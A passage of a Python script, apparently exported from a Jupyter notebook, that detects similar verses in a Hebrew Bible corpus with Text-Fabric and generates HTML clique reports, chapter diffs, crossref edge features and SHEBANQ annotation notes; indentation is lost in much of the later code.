        "{}{}".format(Fs(TEXT_FEATURE).v(w), Fs(TRAILER_FEATURE).v(w))
        for w in L.d(vs, otype="word")
    )
    verse_label = '<td class="vl">{} {}:{}</td>'.format(book, chapter, verse)
    htext = '{}<td class="ht">{}</td>'.format(verse_label, text)
    return '<tr class="ht">{}</tr>'.format(htext)
# In[49]:
def verse_clique(ii):
    return '<table class="ht">{}</table>\n'.format(
        "".join(verse_chunk(i) for i in sorted(ii))
    )
# In[50]:
def condense(vlabels):
    cnd = ""
    (cur_b, cur_c) = (None, None)
    for (b, c, v) in vlabels:
        c = str(c)
        v = str(v)
        sep = (
            ""
            if cur_b is None
            else ". "
            if cur_b != b
            else "; "
            if cur_c != c
            else ", "
        )
        show_b = b + " " if cur_b != b else ""
        show_c = c + ":" if cur_b != b or cur_c != c else ""
        (cur_b, cur_c) = (b, c)
        cnd += "{}{}{}{}".format(sep, show_b, show_c, v)
    return cnd
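# To see what the condensation does, here is a standalone copy of the function applied to
# hypothetical verse labels: repeated books and chapters are suppressed, with ". ", "; "
# and ", " marking book, chapter and verse boundaries respectively.

```python
def condense(vlabels):
    cnd = ""
    (cur_b, cur_c) = (None, None)
    for (b, c, v) in vlabels:
        c, v = str(c), str(v)
        # separator depends on which part of the label changed
        sep = ("" if cur_b is None
               else ". " if cur_b != b
               else "; " if cur_c != c
               else ", ")
        show_b = b + " " if cur_b != b else ""
        show_c = c + ":" if cur_b != b or cur_c != c else ""
        (cur_b, cur_c) = (b, c)
        cnd += "{}{}{}{}".format(sep, show_b, show_c, v)
    return cnd
```

For example, four labels in two books condense to `Genesis 1:1, 2; 2:1. Exodus 3:4`.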
# In[51]:
def print_diff(a, b):
    arep = ""
    brep = ""
    for (lb, ai, aj, bi, bj) in SequenceMatcher(
        isjunk=None, a=a, b=b, autojunk=False
    ).get_opcodes():
        if lb == "equal":
            arep += a[ai:aj]
            brep += b[bi:bj]
        elif lb == "delete":
            arep += '<span class="{}">{}</span>'.format(lb, a[ai:aj])
        elif lb == "insert":
            brep += '<span class="{}">{}</span>'.format(lb, b[bi:bj])
        else:
            arep += '<span class="{}">{}</span>'.format(lb, a[ai:aj])
            brep += '<span class="{}">{}</span>'.format(lb, b[bi:bj])
    return (arep, brep)
# In[52]:
def print_chunk_fine(prev, text, verse_labels, prevlabels):
    if prev is None:
        return """
<tr class="ht tb bb"><td class="vl">{}</td><td class="ht">{}</td></tr>
""".format(
            condense(verse_labels),
            text,
        )
    else:
        (prevline, textline) = print_diff(prev, text)
        return """
<tr class="ht tb"><td class="vl">{}</td><td class="ht">{}</td></tr>
<tr class="ht bb"><td class="vl">{}</td><td class="ht">{}</td></tr>
""".format(
            condense(prevlabels) if prevlabels is not None else "previous",
            prevline,
            condense(verse_labels),
            textline,
        )
# In[53]:
def print_chunk_coarse(text, verse_labels):
    return """
<tr class="ht tb bb"><td class="vl">{}</td><td class="ht">{}</td></tr>
""".format(
        condense(verse_labels),
        text,
    )
# In[54]:
def print_clique(ii, ncliques):
    return (
        print_clique_fine(ii)
        if len(ii) < ncliques * DEP_CLIQUE_RATIO / 100
        else print_clique_coarse(ii)
    )
# In[55]:
def print_clique_fine(ii):
    condensed = collections.OrderedDict()
    for i in sorted(ii, key=lambda c: (-len(chunks[c]), c)):
        chunk = chunks[i]
        fword = chunk[0]
        book = F.book.v(L.u(fword, otype="book")[0])
        chapter = F.chapter.v(L.u(fword, otype="chapter")[0])
        verse = F.verse.v(L.u(fword, otype="verse")[0])
        text = "".join(
            "{}{}".format(Fs(TEXT_FEATURE).v(w), Fs(TRAILER_FEATURE).v(w))
            for w in chunk
        )
        condensed.setdefault(text, []).append((book, chapter, verse))
    result = []
    nv = len(condensed.items())
    prev = None
    for (text, verse_labels) in condensed.items():
        if prev is None:
            if nv == 1:
                result.append(print_chunk_fine(None, text, verse_labels, None))
            else:
                prev = text
                prevlabels = verse_labels
                continue
        else:
            result.append(print_chunk_fine(prev, text, verse_labels, prevlabels))
            prev = text
            prevlabels = None
    return '<table class="ht">{}</table>\n'.format("".join(result))
# In[56]:
def print_clique_coarse(ii):
    condensed = collections.OrderedDict()
    for i in sorted(ii, key=lambda c: (-len(chunks[c]), c))[0:LARGE_CLIQUE_SIZE]:
        chunk = chunks[i]
        fword = chunk[0]
        book = F.book.v(L.u(fword, otype="book")[0])
        chapter = F.chapter.v(L.u(fword, otype="chapter")[0])
        verse = F.verse.v(L.u(fword, otype="verse")[0])
        text = "".join(
            "{}{}".format(Fs(TEXT_FEATURE).v(w), Fs(TRAILER_FEATURE).v(w))
            for w in chunk
        )
        condensed.setdefault(text, []).append((book, chapter, verse))
    result = []
    for (text, verse_labels) in condensed.items():
        result.append(print_chunk_coarse(text, verse_labels))
    if len(ii) > LARGE_CLIQUE_SIZE:
        result.append(
            print_chunk_coarse("+ {} ...".format(len(ii) - LARGE_CLIQUE_SIZE), [])
        )
    return '<table class="ht">{}</table>\n'.format("".join(result))
# In[57]:
def index_clique(bnm, n, ii, ncliques):
    return (
        index_clique_fine(bnm, n, ii)
        if len(ii) < ncliques * DEP_CLIQUE_RATIO / 100
        else index_clique_coarse(bnm, n, ii)
    )
# In[58]:
def index_clique_fine(bnm, n, ii):
    verse_labels = []
    for i in sorted(ii, key=lambda c: (-len(chunks[c]), c)):
        chunk = chunks[i]
        fword = chunk[0]
        book = F.book.v(L.u(fword, otype="book")[0])
        chapter = F.chapter.v(L.u(fword, otype="chapter")[0])
        verse = F.verse.v(L.u(fword, otype="verse")[0])
        verse_labels.append((book, chapter, verse))
    reffl = "{}_{}".format(bnm, n // CLIQUES_PER_FILE)
    return '<p><b>{}</b> <a href="{}.html#c_{}">{}</a></p>'.format(
        n,
        reffl,
        n,
        condense(verse_labels),
    )
# In[59]:
def index_clique_coarse(bnm, n, ii):
    verse_labels = []
    for i in sorted(ii, key=lambda c: (-len(chunks[c]), c))[0:LARGE_CLIQUE_SIZE]:
        chunk = chunks[i]
        fword = chunk[0]
        book = F.book.v(L.u(fword, otype="book")[0])
        chapter = F.chapter.v(L.u(fword, otype="chapter")[0])
        verse = F.verse.v(L.u(fword, otype="verse")[0])
        verse_labels.append((book, chapter, verse))
    reffl = "{}_{}".format(bnm, n // CLIQUES_PER_FILE)
    extra = (
        "+ {} ...".format(len(ii) - LARGE_CLIQUE_SIZE)
        if len(ii) > LARGE_CLIQUE_SIZE
        else ""
    )
    return '<p><b>{}</b> <a href="{}.html#c_{}">{}{}</a></p>'.format(
        n,
        reffl,
        n,
        condense(verse_labels),
        extra,
    )
# In[60]:
def lines_chapter(c):
    lines = []
    for v in L.d(c, otype="verse"):
        vl = F.verse.v(v)
        text = "".join(
            "{}{}".format(Fs(TEXT_FEATURE).v(w), Fs(TRAILER_FEATURE).v(w))
            for w in L.d(v, otype="word")
        )
        lines.append("{} {}".format(vl, text.replace("\n", " ")))
    return lines
# In[61]:
def compare_chapters(c1, c2, lb1, lb2):
    dh = difflib.HtmlDiff(wrapcolumn=80)
    table_html = dh.make_table(
        lines_chapter(c1),
        lines_chapter(c2),
        fromdesc=lb1,
        todesc=lb2,
        context=False,
        numlines=5,
    )
    htext = """<html>{}<body>{}</body></html>""".format(diffhead, table_html)
    return htext
# ### 5.8.3 Compiling the table of experiments
#
# Here we generate the table of experiments, complete with the coloring according to their assessments.
# In[62]:
# generate the table of experiments
def gen_html(standalone=False):
    global other_exps
    TF.info(
        "EXPERIMENT: Generating html report{}".format(
            " (standalone)" if standalone else ""
        )
    )
    stats = collections.Counter()
    pre = (
        """
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
{}
</head>
<body>
""".format(
            ecss
        )
        if standalone
        else ""
    )
    post = (
        """
</body></html>
"""
        if standalone
        else ""
    )
    experiments = """
{}
{}
<table>
<tr><th>chunk type</th><th>chunk size</th><th>similarity method</th>{}</tr>
""".format(
        pre, legend, "".join("<th>{}</th>".format(sim_thr) for sim_thr in SIMILARITIES)
    )
    for chunk_f in (True, False):
        if chunk_f:
            chunk_items = CHUNK_SIZES
        else:
            chunk_items = CHUNK_OBJECTS
        chunk_lb = CHUNK_LBS[chunk_f]
        for chunk_i in chunk_items:
            for sim_m in SIM_METHODS:
                set_matrix_threshold(sim_m=sim_m, chunk_o=chunk_i)
                these_outputs = outputs.get(MATRIX_THRESHOLD, {})
                experiments += "<tr><td>{}</td><td>{}</td><td>{}</td>".format(
                    CHUNK_LABELS[chunk_f],
                    chunk_i,
                    sim_m,
                )
                for sim_thr in SIMILARITIES:
                    okey = (chunk_lb, chunk_i, sim_m, sim_thr)
                    values = these_outputs.get(okey)
                    if values is None:
                        result = '<td class="mis"> </td>'
                        stats["mis"] += 1
                    else:
                        (npassages, ncliques, longest_clique_len) = values
                        cls = assess_exp(
                            chunk_f, npassages, ncliques, longest_clique_len
                        )
                        stats[cls] += 1
                        (lr_el, lr_lb) = ("", "")
                        if (
                            CHUNK_LB,
                            CHUNK_DESC,
                            SIMILARITY_METHOD,
                            SIMILARITY_THRESHOLD,
                        ) == (
                            chunk_lb,
                            chunk_i,
                            sim_m,
                            sim_thr,
                        ):
                            lr_el = '<span class="lr">*</span>'
                            lr_lb = VALUE_LABELS["lr"]
                        result = """
<td class="{}" title="{}">{}
<span class="ps">{}</span><br/>
<a target="_blank" href="{}{}/{}_{}_{}_M{}_S{}.html"><span class="cl">{}</span></a><br/>
<span class="mx">{}</span>
</td>""".format(
                            cls,
                            lr_lb,
                            lr_el,
                            npassages,
                            "" if standalone else LOCAL_BASE_OUTP + "/",
                            EXPERIMENT_DIR,
                            chunk_lb,
                            chunk_i,
                            sim_m,
                            MATRIX_THRESHOLD,
                            sim_thr,
                            ncliques,
                            longest_clique_len,
                        )
                    experiments += result
                experiments += "</tr>\n"
    experiments += "</table>\n{}".format(post)
    if standalone:
        with open(EXPERIMENT_HTML, "w") as f:
            f.write(experiments)
    else:
        other_exps = experiments
    for stat in sorted(stats):
        TF.info("EXPERIMENT: {:>3} {}".format(stats[stat], VALUE_LABELS[stat]))
    TF.info("EXPERIMENT: Generated html report")
# ### 5.8.4 High level formatting functions
#
# Here everything concerning output is brought together.
# In[19]:
# In[63]:
def assess_exp(cf, np, nc, ll):
return (
"out"
if cf
else "rec"
if ll > nc * REC_CLIQUE_RATIO / 100 and ll <= nc * DUB_CLIQUE_RATIO / 100
else "dep"
if ll > nc * DEP_CLIQUE_RATIO / 100
else "dub"
if ll > nc * DUB_CLIQUE_RATIO / 100
else "nor"
)
# In[64]:
def printing():
global outputs, bin_cliques, base_name
TF.info(
"PRINT ({} {} {} M>{} S>{}): sorting out cliques".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
)
)
xt_cliques = {
xterse_clique(c) for c in cliques
} # chapter cliques as tuples of (b, ch) tuples
bin_cliques = {
c for c in xt_cliques if len(c) == 2
} # chapter cliques with exactly two chapters
# all chapters that occur in binary chapter cliques
meta["# BINARY CHAPTER DIFFS"] = len(bin_cliques)
# We generate one kind of info for binary chapter cliques (the majority of cases).
# The remaining cases are verse cliques that do not occur in such chapters, e.g. because they
# have member chunks in the same chapter, or in multiple (more than two) chapters.
ncliques = len(cliques)
chapters_ok = assess_exp(CHUNK_FIXED, len(passages), ncliques, l_c_l) in {
"rec",
"nor",
"dub",
}
cdoing = "involving" if chapters_ok else "skipping"
TF.info(
"PRINT ({} {} {} M>{} S>{}): formatting {} cliques {} {} binary chapter diffs".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
ncliques,
cdoing,
len(bin_cliques),
)
)
meta_html = "\n".join("{:<40} : {:>10}".format(k, str(meta[k])) for k in meta)
base_name = "{}_{}_{}_M{}_S{}".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
)
param_spec = """
<table>
<tr><th>chunking method</th><td>{}</td></tr>
<tr><th>chunking description</th><td>{}</td></tr>
<tr><th>similarity method</th><td>{}</td></tr>
<tr><th>similarity threshold</th><td>{}</td></tr>
</table>
""".format(
CHUNK_LABELS[CHUNK_FIXED],
CHUNK_DESC,
SIMILARITY_METHOD,
SIMILARITY_THRESHOLD,
)
param_lab = "chunk-{}-{}-sim-{}-m{}-s{}".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
)
index_name = base_name
all_name = "{}_{}".format("all", base_name)
cliques_name = "{}_{}".format("clique", base_name)
clique_links = []
clique_links.append(
("{}/{}.html".format(base_name, all_name), "Big list of all cliques")
)
nexist = 0
nnew = 0
if chapters_ok:
chapter_diffs = []
TF.info(
"PRINT ({} {} {} M>{} S>{}): Chapter diffs needed: {}".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
len(bin_cliques),
)
)
bcc_text = "<p>These results look good, so a binary chapter comparison has been generated</p>"
for cl in sorted(bin_cliques):
lb1 = "{} {}".format(F.book.v(cl[0][0]), F.chapter.v(cl[0][1]))
lb2 = "{} {}".format(F.book.v(cl[1][0]), F.chapter.v(cl[1][1]))
hfilename = "{}_vs_{}.html".format(lb1, lb2).replace(" ", "_")
hfilepath = "{}/{}/{}".format(LOCAL_BASE_OUTP, CHAPTER_DIR, hfilename)
chapter_diffs.append(
(
lb1,
cl[0][1],
lb2,
cl[1][1],
"{}/{}/{}/{}".format(
SHEBANQ_TOOL,
LOCAL_BASE_OUTP,
CHAPTER_DIR,
hfilename,
),
)
)
if not os.path.exists(hfilepath):
htext = compare_chapters(cl[0][1], cl[1][1], lb1, lb2)
with open(hfilepath, "w") as f:
f.write(htext)
if VERBOSE:
TF.info(
"PRINT ({} {} {} M>{} S>{}): written {}".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
hfilename,
)
)
nnew += 1
else:
nexist += 1
clique_links.append(
(
"../{}/{}".format(CHAPTER_DIR, hfilename),
"{} versus {}".format(lb1, lb2),
)
)
TF.info(
"PRINT ({} {} {} M>{} S>{}): Chapter diffs: {} newly created and {} already existing".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
nnew,
nexist,
)
)
else:
bcc_text = "<p>These results look dubious at best, so no binary chapter comparison has been generated</p>"
allgeni_html = (
index_clique(cliques_name, i, c, ncliques) for (i, c) in enumerate(cliques)
)
allgen_htmls = []
allgen_html = ""
for (i, c) in enumerate(cliques):
if i % CLIQUES_PER_FILE == 0:
if i > 0:
allgen_htmls.append(allgen_html)
allgen_html = ""
allgen_html += '<h3><a name="c_{}">Clique {}</a></h3>\n{}'.format(
i, i, print_clique(c, ncliques)
)
allgen_htmls.append(allgen_html)
index_html_tpl = """
{}
<h1>Binary chapter comparisons</h1>
{}
{}
"""
content_file_tpl = """<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>{}</title>
<style type="text/css">
{}
</style>
</head>
<body>
<h1>{}</h1>
{}
<p><a href="#meta">more parameters and stats</a></p>
{}
<h1><a name="meta">Parameters and stats</a></h1>
<pre>{}</pre>
</body>
</html>"""
a_tpl_file = '<p><a target="_blank" href="{}">{}</a></p>'
index_html_file = index_html_tpl.format(
a_tpl_file.format(*clique_links[0]),
bcc_text,
"\n".join(a_tpl_file.format(*c) for c in clique_links[1:]),
)
listing_html = "{}\n".format(
"\n".join(allgeni_html),
)
for (subdir, fname, content_html, tit) in (
(None, index_name, index_html_file, "Index " + param_lab),
(base_name, all_name, listing_html, "Listing " + param_lab),
(base_name, cliques_name, allgen_htmls, "Cliques " + param_lab),
):
subdir = "" if subdir is None else (subdir + "/")
subdirabs = "{}/{}/{}".format(LOCAL_BASE_OUTP, EXPERIMENT_DIR, subdir)
if not os.path.exists(subdirabs):
os.makedirs(subdirabs)
if type(content_html) is list:
for (i, c_h) in enumerate(content_html):
fn = "{}_{}".format(fname, i)
t = "{}_{}".format(tit, i)
with open(
"{}/{}/{}{}.html".format(
LOCAL_BASE_OUTP, EXPERIMENT_DIR, subdir, fn
),
"w",
) as f:
f.write(
content_file_tpl.format(t, css, t, param_spec, c_h, meta_html)
)
else:
with open(
"{}/{}/{}{}.html".format(
LOCAL_BASE_OUTP, EXPERIMENT_DIR, subdir, fname
),
"w",
) as f:
f.write(
content_file_tpl.format(
tit, css, tit, param_spec, content_html, meta_html
)
)
destination = outputs.setdefault(MATRIX_THRESHOLD, {})
destination[(CHUNK_LB, CHUNK_DESC, SIMILARITY_METHOD, SIMILARITY_THRESHOLD)] = (
len(passages),
len(cliques),
l_c_l,
)
TF.info(
"PRINT ({} {} {} M>{} S>{}): formatted {} cliques ({} files) {} {} binary chapter diffs".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
len(cliques),
len(allgen_htmls),
cdoing,
len(bin_cliques),
)
)
# ## 5.9 Running experiments
#
# The workflows of doing a single experiment, and then all experiments, are defined.
# In[20]:
# In[65]:
outputs = {}
# In[66]:
def writeoutputs():
global outputs
with open(EXPERIMENT_PATH, "wb") as f:
pickle.dump(outputs, f, protocol=PICKLE_PROTOCOL)
# In[67]:
def readoutputs():
global outputs
if not os.path.exists(EXPERIMENT_PATH):
outputs = {}
else:
with open(EXPERIMENT_PATH, "rb") as f:
outputs = pickle.load(f)
# In[68]:
def do_experiment(chunk_f, chunk_i, sim_m, sim_thr, do_index):
if do_index:
readoutputs()
(do_chunk, do_prep, do_sim, do_clique, skip) = do_params(
chunk_f, chunk_i, sim_m, sim_thr
)
if skip:
return
chunking(do_chunk)
preparing(do_prep)
similarity(do_sim)
cliqueing(do_clique)
printing()
if do_index:
writeoutputs()
gen_html()
# In[69]:
def do_only_chunk(chunk_f, chunk_i):
do_chunk = do_params_chunk(chunk_f, chunk_i)
chunking(do_chunk)
# In[70]:
def reset_experiments():
global outputs
readoutputs()
outputs = {}
reset_params()
writeoutputs()
gen_html()
# In[71]:
def do_all_experiments(no_fixed=False, only_object=None):
global outputs
reset_experiments()
for chunk_f in (False,) if no_fixed else (True, False):
if chunk_f:
chunk_items = CHUNK_SIZES
else:
chunk_items = CHUNK_OBJECTS if only_object is None else (only_object,)
for chunk_i in chunk_items:
for sim_m in SIM_METHODS:
for sim_thr in SIMILARITIES:
do_experiment(chunk_f, chunk_i, sim_m, sim_thr, False)
writeoutputs()
gen_html()
gen_html(standalone=True)
# In[72]:
def do_all_chunks(no_fixed=False, only_object=None):
global outputs
reset_experiments()
for chunk_f in (False,) if no_fixed else (True, False):
if chunk_f:
chunk_items = CHUNK_SIZES
else:
chunk_items = CHUNK_OBJECTS if only_object is None else (only_object,)
for chunk_i in chunk_items:
do_only_chunk(chunk_f, chunk_i)
# In[73]:
def show_all_experiments():
readoutputs()
gen_html()
gen_html(standalone=True)
# # 6a
# # TF features
#
# Based on selected similarity matrices, we produce an
# edge features between verses, containing weighted links to parallel verses.
#
# The features to deliver are called `crossrefSET` and `crossrefLCS` and `crossref`.
#
# These are edge feature, both are symmetric, and hence redundant.
# For every node, the *from* and *to* edges are identical.
#
# The `SET` variant consists of set based similarity, the `LCS` one on longest common subsequence
# similarity.
#
# The `crossref` feature takes the union of both methods, with the average confidence.
#
# The weight is the similarity as percentage integer as it comes from the similarity matrix.
#
# ## Discussion
# We only produce the results of the similarity computation (the matrix), we do not do the cliqueing.
# There are many ways to make cliques, and that can easily be done by users of the data, once the
# matrix results are in place.
# We also do not produce pretty outputs, chapter diffs and other goodies.
# Just the raw similarity data.
#
# The matrix computation is expensive.
# We use fixed settings:
# * verse chunks
# * `SET` method / `LCS` method,
# * matrix threshold 50 / 60
# * similarity threshold 75
#
# That is, we compute a matrix that contains all pairs with similarity above 50 or 60
# depending on whether we do the `SET` method or the `LCS` method.
#
# From that matrix, we only use the similarities above 75.
# This gives us room to play without recomputing the matrix.
#
# We do not want to redo this computation if it can be avoided.
#
# Verse similarity is not something that is very sensitive to change in the encoding.
# It is very likely that similar verses in one version of the data agree with similar
# verses in all other versions.
#
# However, the node numbers of verses may change from version to version, so that part
# must be done again for each version.
#
# This is how we proceed:
# * the matrix computation gives us triples (v1, v2, w), where v1, v2 are verse nodes and d is there similarity
# * we store the result of the matrix computation in a csv file with the following fields:
# * method, v1, v1Ref, v2, v2Ref, d, where v1Ref and v2Ref are verse references,
# each containing exactly 3 fields: book, chapter, verse
# * NB: the similarity table has only one entry for each pair of similar verses per method.
# If (v1, v2) is in the table, (v2, v1) is not in the table, per method.
#
# When we run this notebook for the pipeline, we check for the presence of this file.
# If it is present, we uses the vRefs in it to compute the verse nodes that are valid for the
# version we are going to produce.
# That gives us all the data we need, so we can skip the matrix computation.
#
# If the file is not present, we have to compute the matrix.
# There will be a parameter, called FORCE_MATRIX, which can enforce a re-computation of the matrix.
# We need some utility function geared to TF feature production.
# The `get_verse()` function is simpler, and we do not have to run full experiments.
# In[21]:
# In[74]:
def writeSimTable(similars):
with open(TF_TABLE, "w") as h:
for entry in similars:
h.write("{}\n".format("\t".join(str(x) for x in entry)))
# In[75]:
def readSimTable():
similars = []
stats = set()
with open(TF_TABLE) as h:
for line in h:
(
method,
v1,
v2,
sim,
book1,
chapter1,
verse1,
book2,
chapter2,
verse2,
) = line.rstrip("\n").split("\t")
verseNode1 = T.nodeFromSection((book1, int(chapter1), int(verse1)))
verseNode2 = T.nodeFromSection((book2, int(chapter2), int(verse2)))
if verseNode1 != int(v1):
stats.add(verseNode1)
if verseNode2 != int(v2):
stats.add(verseNode2)
similars.append(
(
method,
verseNode1,
verseNode2,
int(sim),
book1,
int(chapter1),
int(verse1),
book2,
int(chapter2),
int(verse2),
)
)
nStats = len(stats)
if nStats:
utils.caption(
0,
"\t\tINFO: {} verse nodes have been changed between versions".format(
nStats
),
)
utils.caption(0, "\t\tINFO: We will save and use the recomputed ones")
writeSimTable(similars)
else:
utils.caption(
0, "\t\tINFO: All verse nodes are the same as in the previous version"
)
return similars
# In[76]:
def makeSimTable():
similars = []
for (method, similarityCutoff) in (
("SET", 75),
("LCS", 75),
):
(do_chunk, do_prep, do_sim, do_clique, skip) = do_params(
False, "verse", method, similarityCutoff
)
chunking(do_chunk)
preparing(do_prep)
similarity(do_sim or FORCE_MATRIX)
theseSimilars = []
for ((chunk1, chunk2), sim) in sorted(
(x, d) for (x, d) in chunk_dist.items() if d >= similarityCutoff
):
verseNode1 = L.u(chunks[chunk1][0], otype="verse")[0]
verseNode2 = L.u(chunks[chunk2][0], otype="verse")[0]
simInt = int(round(sim))
heading1 = T.sectionFromNode(verseNode1)
heading2 = T.sectionFromNode(verseNode2)
theseSimilars.append(
(method, verseNode1, verseNode2, simInt, *heading1, *heading2)
)
utils.caption(
0,
"\tMethod {}: found {} similar pairs of verses".format(
method, len(theseSimilars)
),
)
similars.extend(theseSimilars)
writeSimTable(similars)
return similars
# In[22]:
# In[77]:
utils.caption(4, "CROSSREFS: Fetching crossrefs")
# In[78]:
xTable = os.path.exists(TF_TABLE)
if FORCE_MATRIX:
utils.caption(
0,
"\t{} requested of {}".format(
"Recomputing" if xTable else "computing",
TF_TABLE,
),
)
else:
if xTable:
utils.caption(0, "\tReading existing {}".format(TF_TABLE))
else:
utils.caption(0, "\tComputing missing {}".format(TF_TABLE))
# In[79]:
if FORCE_MATRIX or not xTable:
similars = makeSimTable()
else:
similars = readSimTable()
# In[23]:
# In[80]:
if not SCRIPT:
print("\n".join(sorted(repr(sim) for sim in similars if sim[0] == "LCS")[0:10]))
print("\n".join(sorted(repr(sim) for sim in similars if sim[0] == "SET")[0:10]))
# In[81]:
crossrefData = {}
otherMethod = dict(LCS="SET", SET="LCS")
# In[82]:
for (method, v1, v2, sim, *x) in similars:
crossrefData.setdefault(method, {}).setdefault(v1, {})[v2] = sim
crossrefData.setdefault(method, {}).setdefault(v2, {})[v1] = sim
omethod = otherMethod[method]
otherSim = crossrefData.get(omethod, {}).get(v1, {}).get(v2, None)
thisSim = sim if otherSim is None else int(round((otherSim + sim) / 2))
crossrefData.setdefault("", {}).setdefault(v1, {})[v2] = thisSim
crossrefData.setdefault("", {}).setdefault(v2, {})[v1] = thisSim
# # Generating parallels module for Text-Fabric
#
# We generate the feature `crossref`.
# It is an edge feature between verse nodes, with the similarity as weight.
# In[89]:
utils.caption(4, "Writing TF parallel features")
# In[90]:
newFeatureStr = "crossref crossrefSET crossrefLCS"
newFeatures = newFeatureStr.strip().split()
# In[91]:
genericMetaPath = f"{thisRepo}/yaml/generic.yaml"
parallelsMetaPath = f"{thisRepo}/yaml/parallels.yaml"
with open(genericMetaPath) as fh:
genericMeta = yaml.load(fh, Loader=yaml.FullLoader)
genericMeta["version"] = VERSION
with open(parallelsMetaPath) as fh:
parallelsMeta = formatMeta(yaml.load(fh, Loader=yaml.FullLoader))
metaData = {"": genericMeta, **parallelsMeta}
# In[92]:
nodeFeatures = dict()
edgeFeatures = dict()
for method in [""] + list(otherMethod):
edgeFeatures["crossref{}".format(method)] = crossrefData[method]
# In[93]:
for newFeature in newFeatures:
metaData[newFeature]["valueType"] = "int"
metaData[newFeature]["edgeValues"] = True
# In[94]:
TF = Fabric(locations=thisTempTf, silent=True)
TF.save(nodeFeatures=nodeFeatures, edgeFeatures=edgeFeatures, metaData=metaData)
# # Generating simple crossref notes for SHEBANQ
# We base them on the average of both methods, we supply the confidence.
# In[33]:
# In[ ]:
MAX_REFS = 10
# In[ ]:
def condenseX(vlabels):
cnd = []
(cur_b, cur_c) = (None, None)
for (b, c, v, d) in vlabels:
sep = (
""
if cur_b is None
else ". "
if cur_b != b
else "; "
if cur_c != c
else ", "
)
show_b = b + " " if cur_b != b else ""
show_c = str(c) + ":" if cur_b != b or cur_c != c else ""
(cur_b, cur_c) = (b, c)
cnd.append("{}[{}{}{}{}]".format(sep, show_b, show_c, v, d))
return cnd
# In[ ]:
crossrefBase = crossrefData[""]
# In[ ]:
refsGrouped = []
nCrossrefs = 0
for (x, refs) in crossrefBase.items():
vys = sorted(refs.keys())
nCrossrefs += len(vys)
currefs = []
for vy in vys:
nr = len(currefs)
if nr == MAX_REFS:
refsGrouped.append((x, tuple(currefs)))
currefs = []
currefs.append(vy)
if len(currefs):
refsGrouped.append((x, tuple(currefs)))
# In[33]:
refsCompiled = []
for (x, vys) in refsGrouped:
vysd = [
(*T.sectionFromNode(vy, lang="la"), " ~{}%".format(crossrefBase[x][vy]))
for vy in vys
]
vysl = condenseX(vysd)
these_refs = []
for (i, vy) in enumerate(vysd):
link_text = vysl[i]
link_target = "{} {}:{}".format(vy[0], vy[1], vy[2])
these_refs.append("{}({})".format(link_text, link_target))
refsCompiled.append((x, " ".join(these_refs)))
utils.caption(
0,
"Compiled {} cross references into {} notes".format(nCrossrefs, len(refsCompiled)),
)
# In[34]:
# In[ ]:
sfields = """
version
book
chapter
verse
clause_atom
is_shared
is_published
status
keywords
ntext
""".strip().split()
# In[ ]:
sfields_fmt = ("{}\t" * (len(sfields) - 1)) + "{}\n"
# In[ ]:
ofs = open("{}/{}".format(thisNotes, notesFile), "w")
ofs.write("{}\n".format("\t".join(sfields)))
# In[ ]:
for (v, refs) in refsCompiled:
firstWord = L.d(v, otype="word")[0]
ca = F.number.v(L.u(firstWord, otype="clause_atom")[0])
(bk, ch, vs) = T.sectionFromNode(v, lang="la")
ofs.write(
sfields_fmt.format(
VERSION,
bk,
ch,
vs,
ca,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
refs,
)
)
# In[34]:
utils.caption(0, "Generated {} notes".format(len(refsCompiled)))
ofs.close()
# # Diffs
#
# Check differences with previous versions.
# In[35]:
# In[35]:
utils.checkDiffs(thisTempTf, thisTf, only=set(newFeatures))
# # Deliver
#
# Copy the new TF feature from the temporary location where it has been created to its final destination.
# In[36]:
# In[36]:
utils.deliverDataset(thisTempTf, thisTf)
# # Compile TF
# In[38]:
# In[ ]:
utils.caption(4, "Load and compile the new TF features")
# In[38]:
TF = Fabric(locations=[coreTf, thisTf], modules=[""])
api = TF.load(newFeatureStr)
api.makeAvailableIn(globals())
# # Examples
# We list all the crossrefs that the verses of Genesis 10 are involved in.
# In[39]:
# In[ ]:
utils.caption(4, "Test: crossrefs of Genesis 10")
# In[ ]:
chapter = ("Genesis", 10)
chapterNode = T.nodeFromSection(chapter)
startVerses = {}
# In[39]:
for method in ["", "SET", "LCS"]:
utils.caption(0, "\tMethod {}".format(method))
for verseNode in L.d(chapterNode, otype="verse"):
crossrefs = Es("crossref{}".format(method)).f(verseNode)
if crossrefs:
startVerses[T.sectionFromNode(verseNode)] = crossrefs
utils.caption(0, "\t\t{} start verses".format(len(startVerses)))
for (start, crossrefs) in sorted(startVerses.items()):
utils.caption(0, "\t\t{} {}:{}".format(*start), continuation=True)
for (target, confidence) in crossrefs:
utils.caption(
0,
"\t\t{:>20} {:<20} confidende {:>3}%".format(
"-" * 10 + ">",
"{} {}:{}".format(*T.sectionFromNode(target)),
confidence,
),
)
# In[29]:
# In[29]:
if SCRIPT:
stop(good=True)
# # 6b. SHEBANQ annotations
#
# The code below generates extensive crossref notes for `4b`, including clique overviews and chapter diffs.
# But since the pipeline in October 2017, we generate much simpler notes.
# That code is above.
#
# We retain this code here, in case we want to expand the crossref functionality in the future again.
#
# Based on selected similarity matrices, we produce a SHEBANQ note set of cross references for similar passages.
# In[30]:
# In[ ]:
def get_verse(i, ca=False):
return get_verse_w(chunks[i][0], ca=ca)
# In[ ]:
def get_verse_o(o, ca=False):
